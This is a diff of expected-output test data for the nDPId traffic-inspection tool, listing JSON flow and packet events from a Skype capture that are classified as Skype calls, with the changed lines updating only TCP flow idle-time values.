00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5UAAEARk+DAqAEi1cezpTLdnEQALDM7exsCCwiB5Tp\/+eOgtAg8Bibngtvk3Z9waqj3cY7b3c6tDEmT"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyDf8AAEARix7AqAEinTeCnDLdnFMAHh0Aex0Cxk3n0hRKPcgDeocb540rNGApyA=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -365,8 +365,8 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5ayYAAEARfGrAqAEinTg0ITLdnEIAJe9eeyUCb3+11x21V+othQ6FZpV0z1bnAthdPIEc8bI="} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1wZMAAEARPVPAqAEib91KKjLdnEYAIaXieycCe1fKnMoPyS7sKN+ClU5dh7E8u7Wn6g=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -382,12 +382,12 @@ 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaS8AAEARxk7AqAEi1ceznDLdnF8ALXpUey8C35QflkiVLuyYHEgftQvOcxrFG1PZDcVv\/V5f70upN2kVjw=="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1431970657789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970657789,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sH5AAEAG9xbAqAEinTg0LMgvAbu6eq5c7rH\/TIAQECxHLAAAAQEICj4x4LNMaAAo"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1431970657789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970657789,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0sH5AAEAG9xbAqAEinTg0LMgvAbu6eq5c7rH\/TIAQECxHLAAAAQEICj4x4LNMaAAo"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9oHUAAEARRyvAqAEinTg0DTLdnFUAKQgoezEC\/l8nlzJZpnLIFE7P8fkc8mrPmKIpl9hxLirEQuOc"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -403,8 +403,8 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9HFoAAEARyynAqAEinTg0KjLdnEUAKXprezkCzIUWKH677Ew8QeRY2LFi0olqYWN\/wfRNYM+xO4zo"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 